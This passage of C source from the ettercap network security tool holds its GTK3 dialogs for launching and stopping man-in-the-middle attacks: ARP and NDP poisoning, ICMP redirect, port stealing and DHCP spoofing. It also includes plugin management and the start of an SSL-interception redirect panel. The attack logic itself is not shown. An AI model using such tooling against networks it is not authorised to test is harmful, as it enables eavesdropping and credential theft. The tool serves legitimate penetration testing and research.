GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Optional parameters"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 2); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_container_add(GTK_CONTAINER (frame), vbox); gtk_widget_show(vbox); button1 = gtk_check_button_new_with_label("Sniff remote connections."); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button1), TRUE); gtk_box_pack_start(GTK_BOX (vbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_check_button_new_with_label("Only poison one-way."); gtk_box_pack_start(GTK_BOX (vbox), button2, FALSE, FALSE, 0); gtk_widget_show(button2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); const char *s_remote = "", *comma = "", *s_oneway = ""; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) { s_remote="remote"; remote = TRUE; } if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) { if(remote) comma = ","; s_oneway = "oneway"; } snprintf(params, PARAMS_LEN+1, "arp:%s%s%s", s_remote, comma, s_oneway); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("arp:"), PARAMS_LEN - strlen("arp:"), gtkui_start_mitm); */ } void gtkui_icmp_redir(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *grid, *hbox, *image, *label, *entry1, *entry2, *frame, *content_area; gint response = 0; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_icmp_redir"); dialog = gtk_dialog_new_with_buttons("MITM Attack: ICMP Redirect", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Gateway Information"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_container_set_border_width(GTK_CONTAINER (grid), 8); gtk_container_add(GTK_CONTAINER (frame), grid); gtk_widget_show(grid); label = gtk_label_new("MAC Address"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP, 1, 1); gtk_widget_show(label); entry1 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry1), ETH_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), entry1, GTK_POS_LEFT+1, GTK_POS_TOP, 1, 1); gtk_widget_show(entry1); label = gtk_label_new("IP Address"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+1, 1, 1); gtk_widget_show(label); entry2 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry2), IP6_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), entry2, GTK_POS_LEFT+1, GTK_POS_TOP+1, 1, 1); gtk_widget_show(entry2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); // memset(params, '\0', PARAMS_LEN); snprintf(params, PARAMS_LEN+1, "icmp:%s/%s", gtk_entry_get_text(GTK_ENTRY(entry1)), gtk_entry_get_text(GTK_ENTRY(entry2))); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("icmp:"), PARAMS_LEN - strlen("icmp:"), gtkui_start_mitm); */ } void gtkui_port_stealing(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *vbox, *hbox, *image, *button1, *button2, *frame, *content_area; gint response = 0; gboolean remote = FALSE; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_port_stealing"); dialog = gtk_dialog_new_with_buttons("MITM Attack: Port Stealing", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Optional parameters"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 2); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_container_add(GTK_CONTAINER (frame), vbox); gtk_widget_show(vbox); button1 = gtk_check_button_new_with_label("Sniff remote connections."); gtk_box_pack_start(GTK_BOX (vbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_check_button_new_with_label("Propagate to other switches."); gtk_box_pack_start(GTK_BOX (vbox), button2, FALSE, FALSE, 0); gtk_widget_show(button2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); const char *s_remote= "", *tree = "", *comma = ""; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) { s_remote="remote"; remote = TRUE; } if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) { if(remote) comma = ","; tree = "tree"; } snprintf(params, PARAMS_LEN+1, "port:%s%s%s", s_remote, comma, tree); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("port:"), PARAMS_LEN - strlen("port:"), gtkui_start_mitm); */ } void gtkui_dhcp_spoofing(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *grid, *hbox, *image, *label, *entry1, *entry2, *entry3, *frame, *content_area; gint response = 0; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_dhcp_spoofing"); // memset(params, '\0', PARAMS_LEN+1); dialog = gtk_dialog_new_with_buttons("MITM Attack: DHCP Spoofing", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Server Information"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); grid = gtk_grid_new(); gtk_grid_set_row_spacing(GTK_GRID(grid), 5); gtk_grid_set_column_spacing(GTK_GRID(grid), 5); gtk_container_set_border_width(GTK_CONTAINER (grid), 8); gtk_container_add(GTK_CONTAINER (frame), grid); gtk_widget_show(grid); label = gtk_label_new("IP Pool (optional)"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP, 1, 1); gtk_widget_show(label); entry1 = gtk_entry_new(); gtk_grid_attach(GTK_GRID(grid), entry1, GTK_POS_LEFT+1, GTK_POS_TOP, 1, 1); gtk_widget_show(entry1); label = gtk_label_new("Netmask"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+1, 1, 1); gtk_widget_show(label); entry2 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry2), IP6_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), entry2, GTK_POS_LEFT+1, GTK_POS_TOP+1, 1, 1); gtk_widget_show(entry2); label = gtk_label_new("DNS Server IP"); gtk_widget_set_halign(label, GTK_ALIGN_START); gtk_grid_attach(GTK_GRID(grid), label, GTK_POS_LEFT, GTK_POS_TOP+2, 1, 1); gtk_widget_show(label); entry3 = gtk_entry_new(); gtk_entry_set_max_length(GTK_ENTRY (entry3), IP6_ASCII_ADDR_LEN); gtk_grid_attach(GTK_GRID(grid), entry3, GTK_POS_LEFT+1, GTK_POS_TOP+2, 1, 1); gtk_widget_show(entry3); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); // memset(params, '\0', PARAMS_LEN); snprintf(params, PARAMS_LEN+1, "dhcp:%s/%s/%s", gtk_entry_get_text(GTK_ENTRY(entry1)), gtk_entry_get_text(GTK_ENTRY(entry2)), gtk_entry_get_text(GTK_ENTRY(entry3))); DEBUG_MSG("ec_gtk_dhcp: DHCP MITM %s", params); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("dhcp:"), PARAMS_LEN - strlen("dhcp:"), gtkui_start_mitm); */ } #ifdef WITH_IPV6 void gtkui_ndp_poisoning(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *vbox, *hbox, *image, *button1, *button2, *frame, *content_area; gint response = 0; gboolean remote = FALSE; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_ndp_poisoning"); // not needed, the \0 is already appended from snprintf // memset(params, '\0', PARAMS_LEN+1); dialog = gtk_dialog_new_with_buttons("MITM Attack: NDP Poisoning", GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER (dialog), 5); #if !GTK_CHECK_VERSION(2, 22, 0) gtk_dialog_set_has_separator(GTK_DIALOG (dialog), FALSE); #endif hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); gtk_container_add(GTK_CONTAINER(content_area), hbox); gtk_widget_show(hbox); image = gtk_image_new_from_icon_name("dialog-question", GTK_ICON_SIZE_DIALOG); gtk_box_pack_start (GTK_BOX (hbox), image, FALSE, FALSE, 5); gtk_widget_show(image); frame = gtk_frame_new("Optional parameters"); gtk_container_set_border_width(GTK_CONTAINER (frame), 5); gtk_box_pack_start (GTK_BOX (hbox), frame, TRUE, TRUE, 0); gtk_widget_show(frame); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 2); gtk_container_set_border_width(GTK_CONTAINER (vbox), 5); gtk_container_add(GTK_CONTAINER (frame), vbox); gtk_widget_show(vbox); button1 = gtk_check_button_new_with_label("Sniff remote connections."); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button1), TRUE); gtk_box_pack_start(GTK_BOX (vbox), button1, FALSE, FALSE, 0); gtk_widget_show(button1); button2 = gtk_check_button_new_with_label("Only poison one-way."); gtk_box_pack_start(GTK_BOX (vbox), button2, FALSE, FALSE, 0); gtk_widget_show(button2); response = gtk_dialog_run(GTK_DIALOG(dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); const char *s_remote = "", *comma = "", *s_oneway = ""; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button1))) { s_remote="remote"; remote = TRUE; } if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (button2))) { if(remote) comma = ","; s_oneway = "oneway"; } snprintf(params, PARAMS_LEN+1, "ndp:%s%s%s", s_remote, comma, s_oneway); gtkui_start_mitm(); } gtk_widget_destroy(dialog); /* a simpler method: gtkui_input_call("Parameters :", params + strlen("ndp:"), PARAMS_LEN - strlen("ndp:"), gtkui_start_mitm); */ } #endif /* * start the mitm attack by passing the name and parameters */ static void gtkui_start_mitm(void) { DEBUG_MSG("gtk_start_mitm"); mitm_set(params); mitm_start(); } /* * stop all the mitm attack(s) */ void gtkui_mitm_stop(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_mitm_stop"); /* create the dialog */ dialog = gtkui_message_dialog(GTK_WINDOW (window), GTK_DIALOG_MODAL|GTK_DIALOG_USE_HEADER_BAR, GTK_MESSAGE_INFO, GTK_BUTTONS_NONE, "Stopping the mitm attack..."); gtk_window_set_position(GTK_WINDOW (dialog), GTK_WIN_POS_CENTER_ON_PARENT); gtk_window_set_resizable(GTK_WINDOW (dialog), FALSE); gtk_widget_queue_draw(dialog); gtk_widget_show_now(dialog); /* for GTK to display the dialog now */ while (gtk_events_pending ()) gtk_main_iteration (); /* stop the mitm process */ mitm_stop(); gtk_widget_destroy(dialog); gtkui_message("MITM attack(s) stopped"); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_offline.c000664 000000 000000 00000002027 13711276346 022432 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include /*******************************************/ /* the interface */ void gtkui_sniff_offline(void) { DEBUG_MSG("gtk_sniff_offline"); //gtkui_create_menu(0); /* offline menus */ } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_plugins.c000664 000000 000000 00000033212 13711276346 022471 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define MAX_DESC_LEN 75 /* proto */ static void gtkui_load_plugin(const char *full); static void gtkui_add_plugin(char active, struct plugin_ops *ops); static void gtkui_plug_destroy(void); static void gtkui_plugins_detach(GtkWidget *child); static void gtkui_plugins_attach(void); static int gtkui_select_plugin(gchar *plugin); static void gtkui_select_plugin_menu(GtkMenuItem *item, gpointer data); static void gtkui_select_plugin_treeview(GtkTreeView *treeview, GtkTreePath *path, GtkTreeViewColumn *column, gpointer data); static void gtkui_create_plug_array(void); gboolean gtkui_plugin_context(GtkWidget *widget, GdkEventButton *event, gpointer data); /* globals */ static GtkWidget *plugins_window = NULL; static GtkWidget *treeview = NULL; static GtkListStore *ls_plugins = NULL; static GtkTreeSelection *selection = NULL; /*******************************************/ /* * display the file open dialog */ void gtkui_plugin_load(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *chooser, *content; gchar *filename; int response = 0; #ifdef OS_WINDOWS char *path = get_full_path("/lib/", ""); #else char *path = INSTALL_LIBDIR "/" PROGRAM "/"; #endif (void) action; (void) value; (void) data; DEBUG_MSG("gtk_plugin_load"); dialog = gtk_dialog_new_with_buttons("Select a plugin...", GTK_WINDOW(window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); chooser = gtk_file_chooser_widget_new(GTK_FILE_CHOOSER_ACTION_OPEN); gtk_container_add(GTK_CONTAINER(content), chooser); gtk_widget_show(chooser); gtk_file_chooser_set_current_folder(GTK_FILE_CHOOSER(chooser), path); #ifdef OS_WINDOWS SAFE_FREE(path); #endif response = gtk_dialog_run (GTK_DIALOG (dialog)); if (response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); filename = gtk_file_chooser_get_filename(GTK_FILE_CHOOSER(chooser)); gtkui_load_plugin(filename); /* update the list */ gtkui_create_plug_array(); g_free(filename); } gtk_widget_destroy (dialog); } static void gtkui_load_plugin(const char *full) { char *file; int ret; #ifdef OS_WINDOWS file = strrchr(full, '\\'); #else file = strrchr(full, '/'); #endif /* remove the last / split path and file increment file pointer to point to filename */ *file++ = 0; DEBUG_MSG("gtk_load_plugin %s/%s", full, file); /* load the plugin */ ret = plugin_load_single(full, file); /* check the return code */ switch (ret) { case E_SUCCESS: gtkui_message("Plugin loaded successfully"); break; case -E_DUPLICATE: ui_error("plugin %s already loaded...", file); break; case -E_VERSION: ui_error("plugin %s was compiled for a different ettercap version...", file); break; case -E_INVALID: default: ui_error("Cannot load the plugin...\nthe file may be an invalid plugin\nor you don't have the permission to open it"); break; } } /* * plugin management */ void gtkui_plugin_mgmt(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *scrolled, *vbox; GtkCellRenderer *renderer; GtkTreeViewColumn *column; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_plugin_mgmt"); /* if the object already exist, set the focus to it */ if (plugins_window) { if(GTK_IS_WINDOW (plugins_window)) gtk_window_present(GTK_WINDOW (plugins_window)); else gtkui_page_present(plugins_window); return; } plugins_window = gtkui_page_new("Plugins", >kui_plug_destroy, >kui_plugins_detach); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER (plugins_window), vbox); gtk_widget_show(vbox); /* list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_NEVER, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect (G_OBJECT (treeview), "row-activated", G_CALLBACK(gtkui_select_plugin_treeview), NULL); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (" ", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Name", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Version", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Info", renderer, "text", 3, NULL); gtk_tree_view_column_set_sort_column_id (column, 3); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); /* create the array for the list widget */ /* or refreshes it if it exists */ gtkui_create_plug_array(); gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), GTK_TREE_MODEL (ls_plugins)); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_plugin_context), NULL); gtk_widget_show(plugins_window); } static void gtkui_plugins_detach(GtkWidget *child) { plugins_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (plugins_window), "Select a plugin..."); gtk_window_set_default_size(GTK_WINDOW (plugins_window), 400, 300); g_signal_connect (G_OBJECT (plugins_window), "delete_event", G_CALLBACK (gtkui_plug_destroy), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(plugins_window, gtkui_plugins_attach); gtk_container_add(GTK_CONTAINER (plugins_window), child); gtk_window_present(GTK_WINDOW (plugins_window)); } static void gtkui_plugins_attach(void) { gtkui_plug_destroy(); gtkui_plugin_mgmt(NULL, NULL, NULL); } static void gtkui_plug_destroy(void) { gtk_widget_destroy(plugins_window); plugins_window = NULL; } /* * create the array for the widget. * erase any previously alloc'd array */ static void gtkui_create_plug_array(void) { GtkTreeIter iter; int res; static int blocked = 0; DEBUG_MSG("gtk_create_plug_array"); if(ls_plugins) gtk_list_store_clear(GTK_LIST_STORE (ls_plugins)); else ls_plugins = gtk_list_store_new (4, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_STRING); /* go thru the list of plugins */ res = plugin_list_walk(PLP_MIN, PLP_MAX, >kui_add_plugin); if (res == -E_NOTFOUND) { blocked = g_signal_handlers_block_by_func(G_OBJECT(treeview), G_CALLBACK(gtkui_select_plugin_treeview), NULL); gtk_list_store_append (ls_plugins, &iter); gtk_list_store_set (ls_plugins, &iter, 0, " ", 1, "No Plugins Loaded", -1); } else if(blocked > 0) { g_signal_handlers_unblock_by_func(G_OBJECT(treeview), G_CALLBACK(gtkui_select_plugin_treeview), NULL); blocked = 0; } } /* * callback function for displaying the plugin list */ static void gtkui_add_plugin(char active, struct plugin_ops *ops) { GtkTreeIter iter; char active_str[2]; active_str[0] = (active)?'*':' '; active_str[1] = 0; gtk_list_store_append (ls_plugins, &iter); gtk_list_store_set (ls_plugins, &iter, 0, active_str, 1, ops->name, 2, ops->version, 3, ops->info, -1); } /* * toggle state of a plugin */ static int gtkui_select_plugin(gchar *plugin) { int ret; if(!plugin) /* bad pointer from gtk_tree_model_get, shouldn't happen */ return -E_NOTHANDLED; /* print the message */ if (plugin_is_activated(plugin) == 0) INSTANT_USER_MSG("Activating %s plugin...\n", plugin); else INSTANT_USER_MSG("Deactivating %s plugin...\n", plugin); /* * pay attention on this ! * if the plugin init does not return, * we are blocked here. So it is encouraged * to write plugins which spawn a thread * and immediately return */ if (plugin_is_activated(plugin) == 1) ret = plugin_fini(plugin); else ret = plugin_init(plugin); /* refresh the list to mark plugin active */ gtkui_create_plug_array(); return ret; } /* * callback when plugin is selected using the context menu */ static void gtkui_select_plugin_menu(GtkMenuItem *item, gpointer data) { gchar *plugin; (void) item; plugin = data; gtkui_select_plugin(plugin); } /* * callback when plugin is double clicked in the treeview */ static void gtkui_select_plugin_treeview(GtkTreeView *treeview, GtkTreePath *path, GtkTreeViewColumn *column, gpointer data) { GtkTreeIter iter; GtkTreeModel *model; GtkTreeSelection *selection; gchar *plugin; (void) path; (void) column; (void) data; model = gtk_tree_view_get_model(treeview); selection = gtk_tree_view_get_selection(treeview); if (gtk_tree_selection_get_selected(selection, &model, &iter)) { gtk_tree_model_get (model, &iter, 1, &plugin, -1); } else return; /* nothing is selected */ gtkui_select_plugin(plugin); } /* * check if plugins have been supplied on the CLI * and try to start all provided plugins */ gboolean gtkui_plugins_autostart(gpointer data) { struct plugin_list *plugin, *tmp; (void) data; DEBUG_MSG("gtkui_plugins_autostart()"); /* if plugins have been defined on the CLI */ if (!LIST_EMPTY(&EC_GBL_OPTIONS->plugins)) { LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { /* first check if the plugin exists */ if (search_plugin(plugin->name) != E_SUCCESS) { plugin->exists = false; USER_MSG("Sorry, plugin '%s' can not be found - skipping!\n\n", plugin->name); } else { /* now we can try to start the plugin */ plugin->exists = true; if (gtkui_select_plugin(plugin->name) != PLUGIN_RUNNING) { USER_MSG("Plugin '%s' can not be started - skipping!\n\n", plugin->name); } } } } return FALSE; } gboolean gtkui_refresh_plugin_list(gpointer data) { /* avoid warning */ (void)data; DEBUG_MSG("gtk_refresh_plugin_list"); /* refresh the list to mark plugin active */ gtkui_create_plug_array(); /* return FALSE so g_idle_add() only calls it once */ return FALSE; } gboolean gtkui_plugin_context(GtkWidget *widget, GdkEventButton *event, gpointer data) { GtkTreeIter iter; GtkTreeModel *model; GtkWidget *menu, *item; char *plugin = NULL; (void) widget; (void) data; model = GTK_TREE_MODEL(ls_plugins); if (gtk_tree_selection_get_selected (GTK_TREE_SELECTION(selection), &model, &iter)) { gtk_tree_model_get (model, &iter, 1, &plugin, -1); } else return FALSE; /* nothing is selected */ if(!plugin) return FALSE; /* bad pointer from gtk_tree_model_get, shouldn't happen */ /* create context menu and bind event to menu item */ menu = gtk_menu_new(); item = gtk_menu_item_new(); gtk_menu_shell_append(GTK_MENU_SHELL(menu), item); g_signal_connect(G_OBJECT(item), "activate", G_CALLBACK(gtkui_select_plugin_menu), plugin); gtk_widget_show(item); /* print the message */ if (plugin_is_activated(plugin) == 0) gtk_menu_item_set_label(GTK_MENU_ITEM(item), "Activate"); else gtk_menu_item_set_label(GTK_MENU_ITEM(item), "Deactivate"); if (event->button == 3) { #if GTK_CHECK_VERSION(3,22,0) gtk_menu_popup_at_pointer(GTK_MENU(menu), (GdkEvent*)event); #else gtk_menu_popup(GTK_MENU(data), NULL, NULL, NULL, NULL, 3, event->time); #endif /* * button press event handle must return TRUE to keep the selection * active when pressing the mouse button */ return TRUE; } return FALSE; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_redirect.c000664 000000 000000 00000044740 13711276346 022621 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* proto */ static void gtkui_sslredir_close(void); static void gtkui_sslredir_detach(GtkWidget *child); static void gtkui_sslredir_attach(void); static void gtkui_sslredir_add(GtkWidget *widget, gpointer data); static void gtkui_sslredir_del(GtkWidget *widget, gpointer data); static void gtkui_sslredir_del_all(GtkWidget *widget, gpointer data); static void gtkui_sslredir_add_list(struct redir_entry *re); static void gtkui_sslredir_add_service(struct serv_entry *se); static void gtkui_sslredir_create_lists(void); static void gtkui_sslredir_af_changed(GtkWidget *widget, gpointer data); static gboolean gtkui_sslredir_key_pressed(GtkWidget *widget, GdkEventKey *event, gpointer data); /* globals */ static GtkWidget *sslredir_window = NULL; static GtkWidget *treeview = NULL; static GtkListStore *redirrules = NULL; static GtkListStore *proto_list = NULL; static GtkListStore *af_list = NULL; static GtkTreeSelection *selection = NULL; /*******************************************/ /* * tab to configure traffic redirection for SSL interception * - no redirect of any interceptable traffic at startup * - selective redirect avoids SSL errors for destinations * not being subject of interception * */ void gtkui_sslredir_show(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *scrolled, *vbox, *hbox, *button, *context_menu, *items; GtkTreeModel *model; GtkCellRenderer *renderer; GtkTreeViewColumn *column; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_sslredir_show()"); /* if the object already exist, set the focus to it */ if (sslredir_window) { if(GTK_IS_WINDOW 